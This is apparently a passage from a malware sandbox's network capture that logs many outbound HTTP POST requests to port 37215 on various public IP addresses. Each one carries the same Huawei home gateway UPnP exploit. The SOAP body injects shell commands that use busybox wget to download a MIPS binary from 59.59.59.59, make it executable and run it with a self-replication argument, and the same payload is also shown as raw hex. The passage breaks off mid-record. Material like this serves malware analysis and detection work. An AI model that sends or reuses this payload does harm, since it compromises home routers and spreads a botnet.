20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2362192.168.2.154868241.153.89.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352247953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2363192.168.2.154368841.48.207.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352260113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2364192.168.2.155329631.95.31.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352427959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2365192.168.2.154421894.196.114.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352447033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2366192.168.2.154344461.206.183.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352518082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2367192.168.2.1551780157.130.41.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.356365919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2368192.168.2.154683241.70.152.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.358485937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2369192.168.2.153300694.58.161.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.358547926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2370192.168.2.1536158197.59.5.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.363723040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2371192.168.2.154412841.189.6.7237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.366873026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2372192.168.2.155723641.217.227.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.366952896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
